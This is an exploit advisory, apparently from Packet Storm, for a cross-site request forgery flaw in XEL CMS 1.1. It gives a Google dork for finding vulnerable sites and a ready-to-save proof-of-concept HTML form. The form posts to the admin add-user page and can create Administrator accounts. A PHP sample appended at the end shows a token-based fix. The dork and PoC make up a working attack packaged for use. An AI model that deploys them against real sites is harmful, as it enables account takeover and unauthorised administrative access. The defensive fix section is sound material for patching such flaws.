XEL CMS 1.1 Cross Site Request Forgery

XEL CMS version 1.1 suffers from a cross site request forgery vulnerability.

Packet Storm
====================================================================================
| # Title     : XEL cms© v1.1 CSRF Vulnerability
| # Author    : indoushka
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)
| # Vendor    : https://cyberxel.com
| # Dork      : "contact at: +91-98144 06799, z91-161-2408274 email: [email protected]"
====================================================================================

poc :

[+] Dorking in Google or other search engine.
[+] Admin Panel : /xelcms/
[+] infected file : /xelcms/user/adduser.php
[+] line 07 set your target.
[+] save code as poc.html

<style>@import 'http://cyberxel.com/xelcms/styles/main.css';
#form1 table {
  font-size: 12px;
}
</style><link href="http://cyberxel.com/xelcms/fckeditor/_samples/sample.css" rel="stylesheet" type="text/css" />
<span class=td><img src="http://cyberxel.com/xelcms/dzimages/arrowpath.gif" />&nbsp;<a href="users.php" class=td>Users</a> <img src="http://cyberxel.com/xelcms//dzimages/arrowpath2.gif" />&nbsp;Add user</h2> </span><br><br>
<form id="form1" name="form1" method="post" action="TARGET_SITE/xelcms/user/adduser.php">
  <table width="99%" border="0" cellpadding="2" cellspacing="2">
    <tr>
      <td width="8%">Username:</td>
      <td width="92%"><label>
        <input name="username" type="text" id="username" style="font-size: 10px;width:300" />
      </label></td>
    </tr>
    <tr>
      <td>Password:</td>
      <td><label>
        <input name="password" type="password" id="password" style="font-size: 10px;width:300" />
      </label></td>
    </tr>
    <tr>
      <td>Confirm password:</td>
      <td><label>
        <input name="password2" type="password" id="password2" style="font-size: 10px;width:300" />
      </label></td>
    </tr>
    <tr>
      <td>Type:</td>
      <td><label>
        <select name="type" id="type" style="font-size: 10px;width:300">
          <option value="" selected></option>
          <option value="Administrator">Administrator</option>
          <option value="User">User</option>
        </select>
      </label></td>
    </tr>
    <tr>
      <td>&nbsp;</td>
      <td>
        <input type="submit" name="Submit" value="Create user" style="font-size: 10px;" />
      </td>
    </tr>
  </table>
</form>

Greetings to :
====================================================================================
jericho * Larry W. Cashdollar * brutelogic * shadow_00715 * 9aylas * djroot.dz * LiquidWorm * Hussin-X * D4NB4R * ViRuS_Ra3cH * yasMouh * CraCkEr
====================================================================================
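
The server-side fix for this class of bug, as an added example that is not XEL CMS code and not from the advisory author: a hardened shape for the add-user POST handler. The `csrf_token` field, the session keys, the `role` flag, both helper names and the HTTPS assumption behind `secure` are assumptions; only the `username`, `password`, `password2` and `type` field names come from the PoC form above.

```php
<?php
// Added illustration, not XEL CMS source. Session keys, the csrf_token field,
// the role flag and both helper names are assumptions.
// SameSite keeps the session cookie off cross-site POSTs (PHP >= 7.3, HTTPS assumed).
session_set_cookie_params(['samesite' => 'Strict', 'httponly' => true, 'secure' => true]);
session_start();

// One unpredictable token per session, embedded by the genuine admin form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison of the submitted token with the session copy.
function csrf_valid($submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return $expected !== '' && is_string($submitted) && hash_equals($expected, $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // A form hosted on another origin cannot read the token, so it stops here.
    if (!csrf_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // Only a logged-in administrator may create accounts (assumed session flag).
    if (($_SESSION['role'] ?? '') !== 'Administrator') {
        http_response_code(403);
        exit('Forbidden');
    }
    // Validate the fields the form submits before touching the user store.
    $pw = $_POST['password'] ?? '';
    if (!is_string($pw) || $pw === '' || $pw !== ($_POST['password2'] ?? null)
        || !in_array($_POST['type'] ?? '', ['Administrator', 'User'], true)) {
        http_response_code(400);
        exit('Invalid input');
    }
    // Create the user here, storing password_hash($pw, PASSWORD_DEFAULT).
    exit('User created');
}
?>
<form method="post" action="adduser.php">
  <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
  <!-- username, password, password2 and type inputs as in the original form -->
</form>
```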
